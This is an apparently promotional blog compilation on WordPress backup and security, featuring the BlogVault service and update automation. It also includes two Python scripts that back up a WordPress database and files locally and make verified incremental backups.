Why WordPress Backup and Security is Important

Do you have a WordPress site? If yes, then it is important to stay up-to-date on the best security measures, with the main goal of shielding your site and its data from any threats.

There are definitely many website owners who worry about the security of WordPress.

In my opinion, open source software is exposed to a wide range of threats. However, if we think practically, we also need to consider it differently. Suppose that is partially valid; even so, none of us can blame WordPress.

Why can’t we blame WordPress? Whose fault is it that your site got hacked? As a site owner, there are a few duties you need to take care of. Hence the major question always comes down to: what are you going to do to keep your site from being hacked?

Today organizations of all sizes are at risk due to the increase in threats. Approximately 90,978 attacks occur every minute. Luckily, there are several methods for protecting a WordPress site. One of the most popular solutions among all is using WordPress backup and security plugins.

How To Manually Back Up WordPress?

WordPress is a web application built on PHP and MySQL, so to have a copy of your site you need to back up all of its files and its database. The simplest way to copy the files is via FTP. Make sure you save all the files and folders in the directory where WordPress is installed on your site.

The WordPress database can be backed up like any other MySQL database. Just follow the directions in our tutorial on how to back up MySQL databases. If you have several MySQL databases and are wondering which one your site is using, open the wp-config.php file in the WordPress root folder and you’ll see the database name stored in the DB_NAME constant.
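The manual backup described above, as an added example that is not part of the original article: it reads the DB_NAME, DB_USER, DB_PASSWORD and DB_HOST constants from wp-config.php, dumps the database with mysqldump through a temporary options file (so the password never appears on the command line, where other local users could read it from the process list), archives the WordPress directory, and writes SHA-256 checksums so the copy can be verified before you rely on it. It assumes mysqldump and tar are installed and that the destination folder lies outside the WordPress directory.

```python
"""Manual WordPress backup: database dump + file archive + checksums (added example)."""
import hashlib
import os
import re
import subprocess
import tarfile
import tempfile
from datetime import datetime, timezone

# Matches lines such as:  define( 'DB_NAME', 'wordpress' );  with single or double quotes.
# Values containing quote characters are not handled (rare in wp-config.php).
_DEFINE_RE = re.compile(
    r"""^\s*define\(\s*['"](?P<name>[A-Z_]+)['"]\s*,\s*['"](?P<value>[^'"]*)['"]\s*\)\s*;""",
    re.MULTILINE,
)


def read_wp_config(path):
    """Return a dict of the string constants defined in wp-config.php."""
    with open(path, encoding="utf-8") as fh:
        text = fh.read()
    return {m.group("name"): m.group("value") for m in _DEFINE_RE.finditer(text)}


def write_defaults_file(cfg, directory):
    """Write a MySQL client options file that only the current user can read."""
    path = os.path.join(directory, "backup.cnf")
    fd = os.open(path, os.O_WRONLY | os.O_CREAT | os.O_EXCL, 0o600)
    with os.fdopen(fd, "w") as fh:
        fh.write("[client]\n")
        fh.write(f"user={cfg['DB_USER']}\n")
        fh.write(f"password={cfg['DB_PASSWORD']}\n")
        fh.write(f"host={cfg.get('DB_HOST', 'localhost')}\n")
    return path


def mysqldump_command(cfg, defaults_file):
    """Build the mysqldump argv; --defaults-extra-file must be the first option."""
    return [
        "mysqldump",
        f"--defaults-extra-file={defaults_file}",
        "--single-transaction",  # consistent snapshot of InnoDB tables without locking
        "--routines",
        "--triggers",
        cfg["DB_NAME"],
    ]


def sha256_file(path):
    """Hash a file in chunks so large archives are not read into memory at once."""
    h = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(1 << 20), b""):
            h.update(chunk)
    return h.hexdigest()


def backup_wordpress(wp_root, dest_dir):
    """Dump the database and archive all files; return the paths written."""
    root = os.path.abspath(wp_root)
    dest = os.path.abspath(dest_dir)
    if dest.startswith(root + os.sep):
        raise ValueError("destination must be outside the WordPress directory")
    cfg = read_wp_config(os.path.join(root, "wp-config.php"))
    stamp = datetime.now(timezone.utc).strftime("%Y%m%dT%H%M%SZ")
    os.makedirs(dest, exist_ok=True)
    sql_path = os.path.join(dest, f"db-{stamp}.sql")
    tar_path = os.path.join(dest, f"files-{stamp}.tar.gz")

    with tempfile.TemporaryDirectory() as tmp:  # options file is removed afterwards
        cnf = write_defaults_file(cfg, tmp)
        with open(sql_path, "wb") as out:
            subprocess.run(mysqldump_command(cfg, cnf), stdout=out, check=True)

    # Archive every file and folder under the WordPress root (wp-content, uploads, ...).
    with tarfile.open(tar_path, "w:gz") as tar:
        tar.add(root, arcname=os.path.basename(root))

    # Checksums let you verify the backup before trusting it.
    sums_path = os.path.join(dest, f"SHA256SUMS-{stamp}")
    with open(sums_path, "w") as fh:
        for p in (sql_path, tar_path):
            fh.write(f"{sha256_file(p)}  {os.path.basename(p)}\n")
    return sql_path, tar_path, sums_path


if __name__ == "__main__":
    import sys
    print(backup_wordpress(sys.argv[1], sys.argv[2]))
```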


WordPress… Is it Secure?

The question of WordPress security will definitely arise in everyone’s mind, as hackers are frequently trying to infiltrate WordPress sites. Even though there are several limitations, WordPress is secure.

The team working on WordPress security is diligent about fixing all kinds of vulnerabilities that surface in WordPress core. Security patches are included in core updates that are released reliably on a regular basis. For instance, there have been times when they fixed a vulnerability less than 40 minutes after its disclosure.

But the condition is that you have to keep WordPress up-to-date in order to receive all the security fixes that are rolled out. Luckily, updates can be applied automatically or manually with a couple of clicks. You can also turn off automatic updates, but then you need to run comparable tests beforehand.

But the most practical and basic action you can take to improve the security of your site is keeping it up-to-date. Every other method you apply is also important, yet it won’t benefit you in any way if WordPress itself is vulnerable.

Here are a few tactics that can help you to secure your WordPress Website –

  1. A Stable Login Page That Resists Brute-Force Attacks

Despite the fact that everyone knows the standard WordPress login page URL (domain-name/wp-login.php or domain-name/wp-admin/), hackers attempt dangerous attacks against it, since the backend of the website is accessed from that well-known URL.

So I would recommend that you customize your login page URL along with the page’s interaction.

You might wonder why anyone should customize their WordPress login page.

Brute force attacks are the most common type of attack on WordPress. In this type of attack, hackers try to get inside your website/blog by attempting various usernames and passwords. There are many ways to help prevent brute force attacks. One of the major steps you can take to reduce the chances of being attacked is changing the WordPress admin login page URL.

Tip: Steps you should follow to customize your login page URL.

The simplest way to change your login URL is by installing, activating, and configuring a security plugin on your WordPress site.

With this, you’ll be able to change:

  1. /wp-admin/ to /admin/
  2. /wp-login.php to /login/
  3. /wp-login.php?action=register to /register/
  4. Change URL according to the page you select in the plugin settings

Before we move ahead, I would recommend that you understand the WordPress security options before you make any changes in the settings section. Have a discussion with your host before you take any unusual step that you aren’t sure of. Follow all the instructions for Better WordPress Security and for updating your Dashboard options.

Step 1: Take a complete backup of your site. Once you’ve finished taking the backup, verify it before you move to the next step.

Step 2: Install and activate a WordPress security plugin that is a good fit for your site. Make sure its features are good enough to manage your login URL.

Step 3: Set up the WP security plugin. Once the setup is ready:

  1. Open the wp-admin or wp-login options page
  2. Create the backup selection
  3. Allow the security plugin to change WP core files
  4. Click the “Secure My Site From Basic Attacks” button.
  5. Click the “Hide” tab.
  6. Check the “Enable Hide Backend” box.
  7. Enter your desired register, login, and admin pages, or leave them at the security plugin’s defaults of “register”, “login”, and “admin”.
  8. Click “Save Changes”.

And that’s it. Follow the above steps and you can easily change your login URL.

  2. It Is Also Important That You Protect Your Admin Dashboard

The admin dashboard, which is the most protected section of all, is also one of the most attractive targets for a hacker. For a hacker, attacking the strongest part is the biggest challenge. If they succeed, it’s a moral triumph, and they use this access to do a lot of damage to your website.

  3. Protect Your Database

Dealing with your database is the most crucial part, as the majority of your site’s information and data is stored there. So do you think your database is protected?

Well… moving ahead!

While I spoke about WordPress security and how you can keep your WordPress site secure, let’s also take a look at WordPress backup.

A backup of your site is always essential in case something goes wrong. Let’s look at the useful ways to back up your WordPress website.

Why is Backup Necessary for your WordPress Site?

Internet threats are increasing, and you have probably heard why you need to keep backups of your site on external devices. Threats to websites have become really serious, so backing up your website helps you safeguard against them.

A regular backup of your website is vital, and all website owners should be aware of it. It is important to take the threats in today’s internet seriously. As the owner of a website you cannot ignore hackers or mistakes made internally.

Taking backups is helpful in several ways. Here is why taking a backup is important:

  1. Threat from the Hackers
  2. A Catastrophe in your computer
  3. When your updates go wrong
  4. Viruses, trojan and other malware can hit your PC
  5. An error occurred by an employee due to negligence     

How To Backup Your WordPress Site With BlogVault?

You might have come across clients or friends complaining about the nasty run-in they had with hackers. Hackers can take your website down with DDoS attacks, and as a security precaution the web host may shut your site down for a couple of days. That can definitely be frustrating. But if you are lucky enough to have a backup, it’s easy to take the site offline safely, seal off the security hole, hit the restore button and, just like that, be back in business.

What would you do if you lost your website(s) to hackers? How would you recover?

I’ve experienced getting hacked recently. Since I didn’t have a backup solution that I could depend on, I had to reconstruct my site from scratch with no outside help.

Whether you lose your site to the bad guys or break something through a manual mistake, you can depend on a solid backup solution to recover and restore your site to its former glory. This is where BlogVault, the subject of this long review, comes in.

The BlogVault service takes over from there, and you can get back to business as usual. You don’t need to confirm emails and so on; simply start backing up your website from the BlogVault dashboard.

Backups on the new BlogVault dashboard

BlogVault is basically a backup service. It is a very simple solution to use. A robust backup solution, BlogVault helps organisations of all sizes.

After you’ve joined BlogVault, you’re instantly provided with a dashboard that helps you manage your site. With BlogVault, you can schedule automatic backups of your whole site. This saves storage space on your server, as the backup is saved on an off-site server. Even if you’re not logged into BlogVault, the backups run unnoticed.

BlogVault is a unique service that takes a progressive approach to protecting your website by backing it up frequently. BlogVault looks at your site, compares it with all the old backups, and saves you time by restoring the latest version flawlessly.

Wrapping up

We’re all human at the end of the day, and the work of system admins, particularly when overburdened with spam, can be really challenging. This is why backups and security exist. Every time your site goes down or information is lost, you can simply rely on BlogVault.

An ideal WordPress backup solution offers a number of features. However, there are two questions you can ask that will help you choose the best WordPress backup plugin for you. They are: what features does the plugin have, and how do they work?

What Makes an Ideal WordPress Backup Plugin?

There is a long list of features which make an ideal WordPress backup plugin.

  • Multiple versions
  • Multiple copies of each version
  • Encrypted backups
  • Independent storage and access
  • Test Restore
  • One-click restore
  • One-click migration
  • Secure site settings

A combination of all of the above sounds like a good deal; doesn’t it?

Most of these features are covered by the popular backup options available on the market, and most premium options have most of the features mentioned above. However, saying so is not useful. It is like saying that every car has an engine, seats, wheels and steering. Just like cars, when it comes to backup solutions, it is all about how they perform, and you really need to do your homework first.

 

Choosing the Best WordPress Backup Plugin

 

There are two points of entry to the debate on the best WordPress backup plugin. One is the differences in features between all the different plugins; despite the uniform titles. The other point of debate is the user experience. What does a good WordPress backup solution do, and how does it do it? Both these questions should be equally relevant.

In this article we explore how following best practices as well as being efficient can answer both: the ‘what’ and the ‘how’ questions.

 

1. WordPress Incremental Backup Plugin

Increased load times or frequent timeouts are highly undesirable in today’s competitive environment. This is particularly a problem for WordPress sites on shared hosting. Incremental backups are perfect for such circumstances.

For example, let us say that you have a photography-focused website with high-resolution images uploaded every day. If your entire site had to be backed up daily, chances are that the backups ruin the user experience of your site’s visitors, or your backups get cut off for taking up too much of the server’s resources.

On the other hand, consider that automatic incremental backups of your WordPress site are done daily. After the initial full backup, each day only the latest changes are backed up. This ensures that you don’t lose any data while the backup solution does not unnecessarily load your server resources. The plugin can scan the site for changes, recognize that the high-resolution images are already backed up, and only add the changes to the latest version of the backups. This means that media (images and videos, which are generally the heaviest files on a site) do not become an extra burden with incremental backups.
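To make the incremental approach concrete, here is an added example (my own code, not BlogVault’s) that backs up a WordPress directory by hashing every file, comparing the result with the previous run’s manifest, and copying only new or changed files into a per-run version folder; a restore walks back through the versions to assemble the full site and checks each file’s hash before using it. The assumed wp-content/cache exclusion and the version naming are my choices.

```python
"""Minimal incremental backup with versioned manifests and verified restore (added example)."""
import hashlib
import json
import os
import shutil
from datetime import datetime, timezone

# Assumed folders that never need backing up (WordPress regenerates page-cache output).
SKIP_DIRS = {"cache", ".git"}


def sha256_file(path):
    """Hash a file in chunks so large media files are not read into memory at once."""
    h = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(1 << 20), b""):
            h.update(chunk)
    return h.hexdigest()


def scan_tree(root):
    """Return {relative_path: sha256} for every regular file under root."""
    manifest = {}
    for dirpath, dirnames, filenames in os.walk(root):
        dirnames[:] = [d for d in dirnames if d not in SKIP_DIRS]
        for name in filenames:
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            manifest[rel] = sha256_file(full)
    return manifest


def diff_manifests(old, new):
    """Files whose content is new or changed since `old`, and files that disappeared."""
    changed = sorted(p for p, digest in new.items() if old.get(p) != digest)
    deleted = sorted(p for p in old if p not in new)
    return changed, deleted


def incremental_backup(site_root, store):
    """Run one backup cycle; return (version_dir, changed, deleted)."""
    os.makedirs(store, exist_ok=True)
    latest = os.path.join(store, "latest.json")
    old = {}
    if os.path.exists(latest):
        with open(latest) as fh:
            old = json.load(fh)
    new = scan_tree(site_root)
    changed, deleted = diff_manifests(old, new)

    # Version names sort chronologically, which restore_version relies on.
    stamp = datetime.now(timezone.utc).strftime("%Y%m%dT%H%M%S.%fZ")
    version_dir = os.path.join(store, stamp)
    os.makedirs(version_dir)
    for rel in changed:  # only new or modified files are copied
        dst = os.path.join(version_dir, rel)
        os.makedirs(os.path.dirname(dst), exist_ok=True)
        shutil.copy2(os.path.join(site_root, rel), dst)

    # The manifest records the complete site state for this version, including files
    # whose bytes were stored by an earlier version, so a restore knows exactly what it needs.
    with open(os.path.join(version_dir, "manifest.json"), "w") as fh:
        json.dump({"files": new, "deleted": deleted}, fh, indent=1, sort_keys=True)
    with open(latest, "w") as fh:
        json.dump(new, fh)
    return version_dir, changed, deleted


def restore_version(store, version, target):
    """Rebuild the site as it was at `version` into `target`; return the file count."""
    with open(os.path.join(store, version, "manifest.json")) as fh:
        wanted = json.load(fh)["files"]
    versions = sorted(v for v in os.listdir(store)
                      if v <= version and os.path.isdir(os.path.join(store, v)))
    for rel, digest in wanted.items():
        # Walk back from this version to the most recent stored copy of the file and
        # verify its hash, so a corrupted or tampered backup is noticed rather than restored.
        for v in reversed(versions):
            src = os.path.join(store, v, rel)
            if os.path.isfile(src) and sha256_file(src) == digest:
                dst = os.path.join(target, rel)
                os.makedirs(os.path.dirname(dst), exist_ok=True)
                shutil.copy2(src, dst)
                break
        else:
            raise FileNotFoundError(f"no intact stored copy of {rel}")
    return len(wanted)
```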

 

2. Control over entire WordPress database & all WordPress files

A WordPress site contains files and database tables. You must be able to confirm that all the tables and files on your site have been backed up, and if not, you must be able to add them. This is possible when you have access to a list that gives you this kind of information; a good WordPress backup solution must offer such access. From such a list, you should also be able to download specific files from a WordPress backup. The same applies to specific tables in your WordPress database. Whether you use it depends on your requirements, but you need to have the option.

Such a feature along with versioned backups allows for restoration of specific files instead of the entire site. This is important if you know the exact pain point on your site. It can be fixed with ease and minimize down-times. This type of granular control is essential when choosing a WordPress backup solution.

The dread of having to sift through thousands of files, when you’re running against the clock to get your site back up and get back to doing business, is unacceptable.

 

3. One-click Restore/Migrate

When you pay for a solution to do the work for you, then you shouldn’t have to manually restore or migrate your site. Otherwise, there is little point to lightening your wallet, is there? A plugin must allow for one-click WordPress restore and one-click migrate options. Managing your site’s functionality in the most critical hours must not be your headache. Usually in such instances inputting your SFTP credentials, destination URL and email id should be enough to easily migrate your WordPress site.

 

4. Test restore option

Apart from restores and migrations, it is equally important to be able to make sure that your backups or migrations work as desired. Providing a test environment to verify the functionality of different backup versions of your WordPress site is simply good practice, but unfortunately, most plugins don’t offer this. It boosts your confidence in your backups and ensures that the reputation of your blog/business stays intact.

 

5. Great customer support

A service or product that does not let you track all the activities from the dashboard or notify you by email will only make you worry about routine processes. If the time comes when you have to get your hands dirty, you should not have to do the work yourself when you are paying for a service. This is the reason you need great customer support.

 

6. Completely independent dashboard

With a completely independent dashboard you always have access to and control over your backups. This means that, unlike other plugins which store backups in your site’s files, you don’t have to restore your site to get your hands on your safety net, a.k.a. your backups. Besides, the whole point of backups is to restore your site. If that is not supported well enough, then backups are not good enough by themselves. You need to know that you have access to secure backups. Multiple copies of encrypted off-site backups are a must.

All the above mentioned best practices will ensure that you’ll find the right value for your money when you need the best WordPress backup plugin.

Reaching for your spare tire, only to find out that it is not working; or worse, that it is missing altogether is unacceptable. WordPress backups are a little more complicated than changing car tires and just like your car tires, there is a lot riding on them too. Your lifetime’s work or the hard-earned reputation of your business is at stake.

 

Building a WordPress website, and maintaining it along with its backups, is no joke.

 

The number of WordPress (WP) backup plugins that are available in the market today must make it seem that problems regarding backups are a thing of the past. But, as we said, backups are complicated. A lot can go wrong when you are using stand-alone plugins (meaning ones that operate on the Software-as-a-Product model).

The WordPress Backup Plugins vs. managed WordPress Backup Service debate can be framed as Standalone Plugin vs. Software as a Service (SaaS) model.

Many articles refer to how the SaaS model economically benefits the end user, however, there are many use-case benefits too. In this article we’ll look at some common issues with stand-alone WP backup plugins, and how a managed WP backup service is a better option.

 

Why Your WordPress Backups Will Fail With the SaaP Model

Installing the plugin is the beginning. Once installed, a stand-alone WordPress backup plugin must be configured. Very often people underestimate how backup plugins may become relatively labor-intensive and accrue more expenditure over time. These may come in different forms including add-ons and premium account features that may be essential to your business.

Some problems you may run into when you’re using a stand-alone WP backup plugin include:

Configuration issues

  • Getting Started: Once a plugin is installed, a remote backup destination must be selected. You can select services like your Google Drive account, Dropbox, or Amazon S3 servers. After this, you must input the login credentials of those accounts.
  • Add-ons: To get the desired setup for your backups, your plugin may require that you buy an add-on. Add-ons can soon build up to become a considerable list. While calculating the cost of a plugin, add-ons must be accounted for, in order to get a fair estimate.
    • Saving backups in more than one destination may need an add-on, and extra charges may be applied.
    • Other features like encrypted backups of your website’s database may not be available unless you pay more for add-ons or upgrade to premium accounts. This means your backups are not really secure even after investing all this time, energy and money.
  • Tracking: Ensuring that backups are happening is important so that you know exactly what resources you have to draw upon in your hour of need.
    • If you’re storing backups on your Amazon S3 account, it needs to be configured to send you notifications when backups occur or when changes are made to files (these are called ‘event’ notifications).
    • Otherwise, you may have to pay more to your plugin company for email notifications. An alternative option is to login to WP website dashboard each time.
  • Key to Your Backups: While backing up your website to your Dropbox account or your own Amazon S3 account, most plugins store a copy of the API key/S3 access key on your WordPress site. The key is how the WordPress backup plugin on your site accesses the backup destination. This may not be in keeping with best practices of performing WordPress backups. In such cases, a hacker who has access to your site, may also have access to your backups via the security key.
  • Know-how: Managing your own Amazon S3 account requires you to know how the account stores your information (buckets, objects) and other points like access control, and versioning so that you can make sure that your data is secure.
  • When You Need to Restore: Apart from all these points, when you need to use your backups to restore your site, you’ll need to unzip the folders and manually restore the files correctly. This may not be the best option for everyone.
  • Storage Options: The plugin company may provide storage space. This option, like in the case of Amazon S3 servers, is an extra charge over the plugin that you must bear. It is a recurring cost to you, which must be paid periodically (monthly/quarterly).

Notification Issues
Like we mentioned, backups are complicated. If for any reason backups stop happening or a problem occurs, it is important that you’re notified immediately. For example, an error in the plugin may have stopped it from backing up your site without notifying you. Or, if you have exceeded the storage limit of your backup destination, backups may stop occurring. Regardless of the scenario, immediate notifications are very important.

The burden of solving all of these issues, on top of running your business/blog, falls on you when you purchase a software product.

Regardless of the cause, the net result is that you’re stranded on the freeway with no (usable) spare, and your tire is a software product. This means it’s likely that you have no one to call for ‘tech support’. This is not a scenario you want to be caught in when you reach for your backups.

Now consider that an expert is looking after your tires, maintaining the air pressure, checking the rims and upgrading the tire as the weather and the terrain changes; along with making sure that it is in the boot of your car. This would simplify and enhance your business, wouldn’t it?

 

How to Ensure That Your WordPress Backup Always Works

And, how can the SaaS model solve the issues mentioned above, for you?

 

When you get a subscription to software, you are getting a service. A team of experts manages and maintains the software and the hardware. They are responsible for granting you access.

Let us clarify, SaaS doesn’t mean that there is no need to download and install a plugin. As in the case of BlogVault, the plugin can be very light as all the complexity sits on the provider’s server, where the heavy-lifting is done. For the user this means:

  • Zero-configuration: Install the plugin and it begins its work. You are ready to use BlogVault from the moment your subscription is active. The backup process starts automatically when you first login.

(This is the main reason this list is relatively short. Remember the long list of configuration issues with standalone backup plugins? Web-hosted software means all of the responsibility for managing the plugin and off-site storage is off your hands. Everything is covered in the subscription.)

  • Less load on the site, better performance: site performance and page load times are crucial to delivering a good user experience, and their importance cannot be overstated, as even marginal differences show measurable changes in results.
  • Rapid Updates: Updates happen mostly on the service provider’s server, reducing the frequency of updates required on your site.
  • Backups are safe even when your site is compromised: Backups, because they are completely independent of your website, are accessible even when your website is down. You don’t need to get your site running to access your backups.
  • Incremental Backups: This means large sites are also completely backed up without hassle. Backing up only the changes means faster and more efficient backups.
  • Expert Tech Support: A team of experts maintain the software and the hardware. You can not only count on tech support, but know that the team can be highly responsive as they are maintaining the backups themselves. This can help at times of Test Restore, Auto Restore and Migrations. For more on these features you can check out BlogVault.

 
Now you know the differences between SaaP and SaaS models in the context of WordPress Backup. Make an informed choice that gives you the most scope for developing your business, without adding to your task list or financial burden.

 

WordPress site owners are constantly asked to update their sites. But keeping track of updates is incredibly difficult because of the frequency and number of updates to be made. This is why automating updates might be a useful practice.

 

Making sure your WordPress site is up to date could be an overwhelming process, since there are so many releases.

 

If there’s one piece of advice in the world of WordPress for site owners, it’s this: update, update, update. Updating WordPress is easy in theory, especially since all site-owners receive notifications about core and plugin updates. When it has to be put into practice, though, updating WordPress is its own beast. Not only might updates break WordPress sites; they might also cause incompatibilities, and be impossible to undo as well. This is why it’s important to always have a reliable backup solution for WordPress sites.

Updating WordPress is an important task though, because of new features that might impact user experience, but also security updates that help against major vulnerabilities. However, with WordPress receiving updates very frequently on the Core as well as the add-on front, it is difficult to keep up with all the changes, and apply them. This is why automating updates on WordPress sites might be a workable solution for you as a WordPress site owner.

Types of WordPress Updates

While updates for WordPress add-ons have both developmental as well as security updates, updates for WordPress core perform different functions. Based on these functions, WordPress Core updates can be categorized into:

  1. Release updates, which contain both Major and Minor releases.
    1. Major updates contain developmental changes including the addition of new features, or changes to core technologies on WordPress. Every major release is named after a major jazz musician.
    2. Minor updates contain security patches and fixes. As a result, they are highly recommended, and are automated by default on every installation of WordPress. Every WordPress site is recommended to run these updates since they contain important security updates that keep WordPress sites safe.
  2. Developmental updates, which are only for changes that might be unstable; these updates are what future developments are built on. Also known as ‘bleeding edge’ updates, they are only meant for sites running the developmental version of WordPress.
  3. Translation updates, which are language packs, and come in handy if your WordPress site has multilingual support.

Depending on your comfort-level with code, and the time you’re willing to spend maintaining your site, you could automate your WordPress site’s updates manually, with the help of a plugin, or via managed WordPress services. Every method has its pros and cons, so it’s best to choose one with careful thought.

Automating WordPress Updates the Manual Way

This method will require you to make changes to your WordPress installation’s core files.

How to automate updates to WordPress Core the Manual Way

Updating WordPress Core includes making changes to the wp-config.php file.

WordPress reads a constant called WP_AUTO_UPDATE_CORE, set with define() in the wp-config.php file. The value you assign to this constant determines which WordPress release updates are automated.

To Automate All WordPress Core Updates

Assign the value true to the constant, as demonstrated:

define( 'WP_AUTO_UPDATE_CORE', true );

This will enable the automation of all release updates, developmental updates, and translation updates on your WordPress site.

To Only Automate WordPress Core Minor Release Updates

As mentioned, WordPress automatically applies Minor release and translation updates to your site. However, if you disabled all automatic updates by assigning the constant the value false, you would have disabled Minor updates too. Just assign the string value 'minor' to the same constant instead of true. This will disable all updates other than Minor updates, which keep your WordPress site secure.

Here’s how you do it (note that 'minor' is a quoted string, unlike true and false):

define( 'WP_AUTO_UPDATE_CORE', 'minor' );

 

How to Automate Updates to WordPress Add-ons the Manual Way

Automatically updating add-ons isn’t recommended by WordPress, since the developers’ updates might work for that plugin/theme, but might be incompatible with other add-ons or elements on your WordPress site. However, if your WordPress site is simple and has very few plugins/themes that are compatible with each other, it might not be as big a problem.

In order to manually configure your installation of WordPress to update plugins and themes, you have to hook a filter called auto_update_$type, which WordPress applies from code in the wp-admin folder. The value of $type (plugin or theme) determines which kind of WordPress add-on is updated automatically.

To automatically update all plugins on your WordPress site, the filter must read:

add_filter( 'auto_update_plugin', '__return_true' );

To automatically update all themes on your WordPress site, the filter must read:

add_filter( 'auto_update_theme', '__return_true' );

Pros of Manual Automation of Updates

  • The code isn’t complex, so it’s beginner friendly.
  • Manual automation is free.
  • WordPress site owners won’t have to install an extra plugin just to keep their site up to date.

Cons of Manual Automation of Updates

  • The changes have to be made to the WordPress wp-config.php files and the wp-admin folder. This might make some WordPress users uncomfortable, especially since changes to the WordPress core files are not recommended.
  • Making the changes to code might require some time, especially for WordPress novices.
  • If your site crashes after an update, you will have to disable each update manually and check your site’s status after each one.

 

Automating Your WordPress Site with Plugins

This method comes in handy for WordPress site-owners who do not want to tinker with code themselves, and don’t mind installing an extra plugin on their site. A couple of examples of plugins that help automate updates, are Advanced Automatic Updates, and WP Updates Settings.

How to Use the Advanced Automatic Updates Plugin

Step 1: Install and activate the plugin.

Step 2: Locate the plugin under your WordPress site’s Settings tab, and click on it.

Using the Advanced Automatic Updates plugin

 

Step 3: Check the kind of updates you would like to automate on your WordPress site.

 

Updating Themes with the Advanced Automatic Updates plugin

 

If you would like notifications about these updates to be sent to an email address other than the one of the site owner, you can enter it here:

 

Notifications with Advanced Automatic Updates

 

As you can see, you can also disable email notifications about the same, and request for debug information (in case you’re running development updates).

How to Use the WP Updates Plugin

Step 1: Install and activate the plugin.

Step 2: Just like for the Advanced Automatic Updates plugin, locate the Updates tab under your Settings tab, and click on it.

 

The WP Updates plugin shows up under Settings

 

Step 3: Choose the kind of WordPress Core release updates you would like to automate on your WordPress site.

 

Core Updates with the WP Updates plugin

 

Step 4: Choose whether you would like to automatically update add-ons on your WordPress site.

 

Plugin and theme updates with the WP Updates plugin

 

Step 5: If you’d like translation and developmental updates, click on the appropriate check-boxes.

 

Click on these checkboxes if you want other updates also to be automated.

 

Pros of Automating Your WordPress Updates With a Plugin

  • These plugins do the work for you: you don’t have to touch any code.
  • Most plugins that automate WordPress updates let you enable or disable each kind of update with a single click.

Cons of Automating Your WordPress Updates With a Plugin

  • You have to install an extra plugin just to manage updates, and that plugin itself needs to be kept up to date.
  • Some plugins only automate WordPress core updates; check whether the one you pick also covers plugins and themes.
  • You, as the site owner, still have to find and fix the problem if an update breaks your site, so keep a backup taken just before updates are applied.

Using Managed Services to Automate Your WordPress Site

There are two types of managed services you could use to automate updates on your WordPress site: managed WordPress hosting, and WordPress support and maintenance services.

Managed WordPress Hosting

These services manage your WordPress site’s hosting and also take care of some site-level chores, such as updates. Two examples of managed WordPress hosting providers are Flywheel and WP Engine. They automate WordPress updates, but with a process designed to leave you no worse off whatever the state of your site’s compatibility:

  1. The hosting provider checks their systems for compatibility with the WordPress update (whether this covers add-on updates as well as core depends on the host).
  2. They then mail you beforehand with the dates on which your site will be updated.
  3. The host takes a backup of your WordPress site before the update, and only then performs it.
  4. Once the update is applied, they check the site for issues.
  5. If your site turns out to be incompatible with the update, the host restores it from the backup it made.
  6. The service then mails you the status of the update (successful or unsuccessful, and why if unsuccessful).
  7. If you have tested your site yourself and found it incompatible, some hosts let you ask for updates to be postponed until you have fixed the issue.

Notes:

Plugin and theme updates are generally not applied automatically by managed WordPress hosts, because plugins interact with each other and with your theme, and an update to one can conflict with another and break your site.

If you’d still like add-on updates automated, get in touch with your WordPress host about it.

Since each managed host has different terms and conditions and pricing plans, read their documentation carefully and then get in touch via email or their in-site chat support.

Pros of Using a Managed Web Hosting Service With Automatic WordPress Updates

  • You, as a WordPress site owner, don’t have to fiddle with the WordPress core files.
  • Your WordPress hosting service tests and runs WordPress updates for you.

Cons of Using a Managed Web Hosting Service With Automatic WordPress Updates

  • Managed WordPress hosting comes at a price.
  • These services don’t take care of every issue that can come up while updating your WordPress site. If your site has customizations that make it incompatible with a WordPress update, the host may mail you asking you to seek a professional developer’s assistance. This means that even though you’re paying a premium for managed hosting, you might also have to hire a WordPress developer separately.

WordPress Support and Maintenance Services

WordPress support and maintenance services (such as WP Curve, WP Maintainer, and Valet) suit busy site owners who can afford a dedicated service just for maintaining their WordPress sites. In terms of updates and maintenance, these services usually provide:

  1. Core and add-on updates.
  2. Support and repairs in case of incompatibility.
  3. An audit of your site’s security and maintenance state, so that the chances of it breaking on update are reduced.
  4. Regular backups to fall back on if any update proves incompatible.

Similar to managed WordPress hosting services, it is recommended that you go through the list of their offerings, (and their pricing plans) carefully. All you have to do after that, is contact them over email, or from their respective websites.

Pros of Depending on WordPress Support and Maintenance Services

  • Since you are paying these services specifically to maintain your WordPress site, you can expect them to solve any problems you might have while updating your WordPress site.
  • You need not hire a developer to this end.

Cons of Depending on WordPress Support and Maintenance Services

  • These services come at a premium price, and usually charge extra to fix issues that come up during updates; each service has its own pricing plan.
  • A number of maintenance and support services do not include support in the base price, so if you run into issues with your site it can be expensive to get them sorted out.

Automating your WordPress updates might seem like an easy way to keep your site current with security patches and new features, but it comes with caveats. Not only might an update break your site, it might also be difficult to undo. This is why every WordPress site owner should maintain a recent, secure backup of their site that they can rely on.

WordPress is the most popular CMS in the world. With WordPress powering 26% of the world’s websites it’s also one of the most preferred ways to publish content. What makes it so popular?

While there may not be a perfect CMS (Content Management System), WordPress currently comes pretty close to being the best one. At least it is the most popular one by far. Search trends on Google show that there is considerable daylight between WordPress and other CMSes out there. This is, at least, to say that WordPress generates more interest than other platforms.

WordPress is the most popular CMS in the world.

The popularity of WordPress represented by search trends is reflected in the usage rates of the CMS, with WordPress being used nearly ten times as much as its closest competitor, Joomla. While WordPress tops at 26.7% of websites using the platform, Joomla is used by about 2.8% of websites. This difference in usage rates only becomes more stark when you take a look at the market share of the CMS. WordPress has nearly 60% of the market share.

While the WordPress community across the world was growing, and more and more people were building WordPress sites for varied purposes, only the recent release of statistics has managed to shine a light on how big the CMS has actually become. About 26% of websites in the world are said to be powered by WordPress.

This number is expected to reach 30% within a few years: WordPress is not just the most popular content publishing option on the web, it is also the fastest growing CMS. It is simply the most popular option for building websites. With this, the mission of “democratizing publishing”, as Matt Mullenweg phrased it, seems to have been realized. However, this realization only seems to be the beginning of something bigger.

Here are some reasons as to not only why WordPress is big now but also why it is expected to continue to grow.

WordPress is Open-source

WordPress is open-source software and will remain so. Because you can run it on hosting you control, no single company owns the platform or can decide on its own to delete your content, as happened with Dennis Cooper’s blog on Blogger. You are therefore unlikely to lose your content when you publish it with WordPress.

This means that WordPress is not only the most economically viable option, it also gives you (the user) complete ownership of your content and puts the power of publishing squarely in your hands.

WordPress In Your Language – Inclusive

